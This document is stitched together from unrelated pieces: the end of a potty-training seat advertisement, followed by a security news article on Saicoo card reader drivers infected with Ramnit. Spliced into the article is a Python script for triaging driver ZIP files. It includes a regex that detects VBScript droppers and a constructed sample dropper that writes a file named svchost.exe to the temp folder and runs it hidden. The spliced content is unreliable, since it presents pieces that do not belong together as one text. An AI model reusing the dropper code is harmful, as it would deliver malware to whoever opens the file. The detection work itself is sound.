It is also possible to make your toilet compatible with Super Potty Trainer if there is no gap between the toilet seat and the rim. You can do this by replacing the toilet seat for the one that has bumpers – these will create a small gap and make the toilet compatible with the product.

Loved by pediatricians and parents

Both pediatricians and parents love Super Potty Trainer. Pediatricians recommend Super Potty Trainer because it’s a simple and safe way to potty train toddlers. It allows a toddler to have a proper position on the toilet, which is essential for right elimination. And that prevents constipation and urinary infections.

Parents love Super Potty Trainer because it makes potty training less stressful for both parent and toddler. The product is also very affordable and easy to use.

If you are looking for an easy, stress-free way to potty train your toddler, then Super Potty Trainer is your product!

The post Super Potty Trainer – A Shark Tank Product For Toddlers Which Takes The Internet By Storm! appeared first on Comfy Bummy.

When Your Smart ID Card Reader Comes With Malware

Millions of U.S. government employees and contractors have been issued a secure smart ID card that enables physical access to buildings and controlled spaces, and provides access to government computer networks and systems at the cardholder’s appropriate security level. But many government employees aren’t issued an approved card reader device that lets them use these cards at home or remotely, and so turn to low-cost readers they find online. What could go wrong? Here’s one example.

A sample Common Access Card (CAC). Image: Cac.mil.

KrebsOnSecurity recently heard from a reader — we’ll call him “Mark” because he wasn’t authorized to speak to the press — who works in IT for a major government defense contractor and was issued a Personal Identity Verification (PIV) government smart card designed for civilian employees. Not having a smart card reader at home and lacking any obvious guidance from his co-workers on how to get one, Mark opted to purchase a $15 reader from Amazon that said it was made to handle U.S. government smart cards.

The USB-based device Mark settled on is the first result that currently comes up when one searches Amazon.com for “PIV card reader.” The card reader Mark bought was sold by a company called Saicoo, whose sponsored Amazon listing advertises a “DOD Military USB Common Access Card (CAC) Reader” and has more than 11,700 mostly positive ratings.

The Common Access Card (CAC) is the standard identification for active duty uniformed service personnel, selected reserve, DoD civilian employees, and eligible contractor personnel. It is the principal card used to enable physical access to buildings and controlled spaces, and provides access to DoD computer networks and systems.

Mark said when he received the reader and plugged it into his Windows 10 PC, the operating system complained that the device’s hardware drivers weren’t functioning properly. Windows suggested consulting the vendor’s website for newer drivers.

The Saicoo smart card reader that Mark purchased. Image: Amazon.com

So Mark went to the website mentioned on Saicoo’s packaging and found a ZIP file containing drivers for Linux, Mac OS and Windows:

Image: Saicoo

Out of an abundance of caution, Mark submitted Saicoo’s driver file to Virustotal.com, which scans any submitted file with more than five dozen antivirus and security engines. Virustotal reported that some 43 different security tools detected the Saicoo drivers as malicious. The consensus seems to be that the ZIP file currently harbors a malware threat known as Ramnit, a fairly common but dangerous trojan that spreads by appending itself to other files.

Image: Virustotal.com

Ramnit is a well-known and older threat — first surfacing more than a decade ago — but it has evolved over the years and is still employed in more sophisticated data exfiltration attacks. Amazon said in a written statement that it was investigating the reports.

“Seems like a potentially significant national security risk, considering that many end users might have elevated clearance levels who are using PIV cards for secure access,” Mark said.

Mark said he contacted Saicoo about their website serving up malware, and received a response saying the company’s newest hardware did not require any additional drivers. He said Saicoo did not address his concern that the driver package on its website was bundled with malware.

In response to KrebsOnSecurity’s request for comment, Saicoo sent a somewhat less reassuring reply.

“From the details you offered, issue may probably caused by your computer security defense system as it seems not recognized our rarely used driver & detected it as malicious or a virus,” Saicoo’s support team wrote in an email.

“Actually, it’s not carrying any virus as you can trust us, if you have our reader on hand, please just ignore it and continue the installation steps,” the message continued. “When driver installed, this message will vanish out of sight. Don’t worry.”

Saicoo’s response to KrebsOnSecurity.

The trouble with Saicoo’s apparently infected drivers may be little more than a case of a technology company having its site hacked and responding poorly. Will Dormann, a vulnerability analyst at CERT/CC, wrote on Twitter that the executable files (.exe) in the Saicoo drivers ZIP file were not altered by the Ramnit malware; only the HTML files included in the archive had been infected.

Dormann said it is bad enough on its own that searching for device drivers is one of the riskiest activities one can undertake online.

“Doing a web search for drivers is a VERY dangerous (in terms of legit/malicious hit ratio) search to perform, based on results of any time I’ve tried to do it,” Dormann added. “Combine that with the apparent due diligence of the vendor outlined here, and well, it ain’t a pretty picture.”
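The two findings above, that VirusTotal flagged the archive and that only the bundled HTML files (not the .exe files) carried the Ramnit infection, are exactly what a member-by-member triage of a vendor ZIP is meant to surface before anything gets installed. The following script is an added example and is not code from the article, from Saicoo, or from CERT/CC. It unpacks an archive in memory, records a SHA-256 per member (the value you would paste into a VirusTotal hash search rather than uploading a possibly sensitive file), checks that members with executable extensions at least begin with a PE `MZ` header, and flags HTML members that carry an appended VBScript file-dropper. The dropper pattern is modelled on public write-ups of Ramnit’s HTML infection and is an assumed heuristic, not a vendor-grade signature; the sample archive, file names and “driver” bytes are all constructed for the example.

```python
"""Offline, member-by-member triage of a vendor driver ZIP.

Added example, not from the article or from any vendor. The VBScript
dropper heuristic is an assumption modelled on public Ramnit write-ups,
and the sample archive below is constructed for illustration.
"""
import hashlib
import io
import re
import zipfile

# Heuristic (assumed, not an official signature): an HTML file that carries a
# VBScript block which instantiates Scripting.FileSystemObject is writing
# something to disk, which a readme has no business doing.
VBS_DROPPER = re.compile(
    rb"<script[^>]*language\s*=\s*[\"']?vbscript[\"']?[^>]*>.*?"
    rb"scripting\.filesystemobject.*?</script>",
    re.IGNORECASE | re.DOTALL,
)


def sha256_hex(data: bytes) -> str:
    """Hash to look up on VirusTotal without uploading the file itself."""
    return hashlib.sha256(data).hexdigest()


def classify_member(name: str, data: bytes) -> dict:
    """Return size, SHA-256 and a verdict string for one archive member."""
    low = name.lower()
    verdict = "ok"
    if low.endswith((".html", ".htm")):
        if VBS_DROPPER.search(data):
            verdict = "suspicious: VBScript file dropper appended to HTML"
    elif low.endswith((".exe", ".dll", ".sys")):
        # A PE file starts with the DOS 'MZ' stub; anything else under a
        # driver extension deserves a closer look.
        if not data.startswith(b"MZ"):
            verdict = "suspicious: PE extension but no MZ header"
    return {"name": name, "size": len(data), "sha256": sha256_hex(data), "verdict": verdict}


def triage_zip(zip_bytes: bytes) -> list:
    """Classify every file in the archive, in archive order."""
    results = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            results.append(classify_member(info.filename, zf.read(info)))
    return results


def suspicious_members(zip_bytes: bytes) -> list:
    """Names of members whose verdict is anything other than 'ok'."""
    return [r["name"] for r in triage_zip(zip_bytes) if r["verdict"] != "ok"]


def build_sample_zip() -> bytes:
    """Constructed sample: a stand-in 'driver' with an MZ header (not a real
    PE), a clean readme, and a readme with an appended dropper block."""
    fake_exe = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 64
    clean_html = b"<html><body>Install the driver, then reboot.</body></html>\n"
    infected_html = clean_html + (
        b"<SCRIPT Language=VBScript><!--\n"
        b'DropFileName = "svchost.exe"\n'
        b'WriteData = "4D5A90000300000004000000FFFF0000"\n'
        b'Set FSO = CreateObject("Scripting.FileSystemObject")\n'
        b'DropPath = FSO.GetSpecialFolder(2) & "\\" & DropFileName\n'
        b"If FSO.FileExists(DropPath)=False Then\n"
        b"Set FileObj = FSO.CreateTextFile(DropPath, True)\n"
        b"For i = 1 To Len(WriteData) Step 2\n"
        b'FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))\n'
        b"Next\n"
        b"FileObj.Close\n"
        b"End If\n"
        b'Set WSHshell = CreateObject("WScript.Shell")\n'
        b"WSHshell.Run DropPath, 0\n"
        b"//--></SCRIPT>\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("windows/driver_installer.exe", fake_exe)
        zf.writestr("readme.html", clean_html)
        zf.writestr("windows/readme.html", infected_html)
    return buf.getvalue()


if __name__ == "__main__":
    for r in triage_zip(build_sample_zip()):
        print(f"{r['verdict']:52} {r['sha256'][:16]}  {r['name']}")
```

Run against the constructed archive it flags only `windows/readme.html`; the `.exe` is left alone, matching the split Dormann described. On a real download, replace `build_sample_zip()` with the bytes of the vendor ZIP, search each SHA-256 on VirusTotal, and treat a dropper hit in any member as a reason not to install anything from the package, whatever the executables’ own scan results say.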

But by all accounts, the potential attack surface here is enormous, as many federal employees clearly will purchase these readers from myriad online vendors when the need arises. Saicoo’s product listings, for example, are replete with comments from customers who state that they work at a federal agency (and several who reported problems installing drivers).

A thread about Mark’s experience on Twitter generated a strong response from some of my followers, many of whom apparently work for the U.S. government in some capacity and have government-issued CAC or PIV cards.

Two things emerged clearly from that conversation. The first was general confusion about whether the U.S. government has any sort of list of approved vendors. It does. The General Services Administration (GSA), the agency which handles procurement for federal civilian agencies, maintains a list of approved card reader vendors at idmanagement.gov (Saicoo is not on that list). [Thanks to @MetaBiometrics and @shugenja for the link!]

The other theme that ran through the Twitter discussion was the reality that many people find buying off-the-shelf readers more expedient than going through the GSA’s official procurement process, whether it’s because they were never issued one or the reader they were using simply no longer worked or was lost and they needed another one quickly.

“Almost every officer and NCO [non-commissioned officer] I know in the Reserve Component has a CAC reader they bought because they had to get to their DOD email at home and they’ve never been issued a laptop or a CAC reader,” said David Dixon, an Army veteran and author who lives in Northern Virginia. “When your boss tells you to check your email at home and you’re in the National Guard and you live 2 hours from the nearest [non-classified military network installation], what do you think is going to happen?”

Interestingly, anyone asking on Twitter about how to navigate purchasing the right smart card reader and getting it all to work properly is invariably steered toward militarycac.com. The website is maintained by Michael Danberry, a decorated and retired Army veteran who launched the site in 2008 (its text and link-heavy design very much takes one back to that era of the Internet and webpages in general). His site has even been officially recommended by the Army (PDF). Mark shared emails showing Saicoo itself recommends militarycac.com.

Image: Militarycac.com.

“The Army Reserve started using CAC logon in May 2006,” Danberry wrote on his “About” page. “I [once again] became the ‘Go to guy’ for my Army Reserve Center and Minnesota. I thought Why stop there? I could use my website and knowledge of CAC and share it with you.”

Danberry did not respond to requests for an interview — no doubt because he’s busy doing tech support for the federal government. The friendly message on Danberry’s voicemail instructs support-needing callers to leave detailed information about the issue they’re having with CAC/PIV card readers.

Dixon said Danberry has “done more to keep the Army running and connected than all the G6s [Army Chief Information Officers] put together.”

In many ways, Mr. Danberry is the equivalent of that little-known software developer whose tiny open-source code project ends up becoming widely adopted and eventually folded into the fabric of the Internet. I wonder if he ever imagined 15 years ago that his website would one day become “critical infrastructure” for Uncle Sam?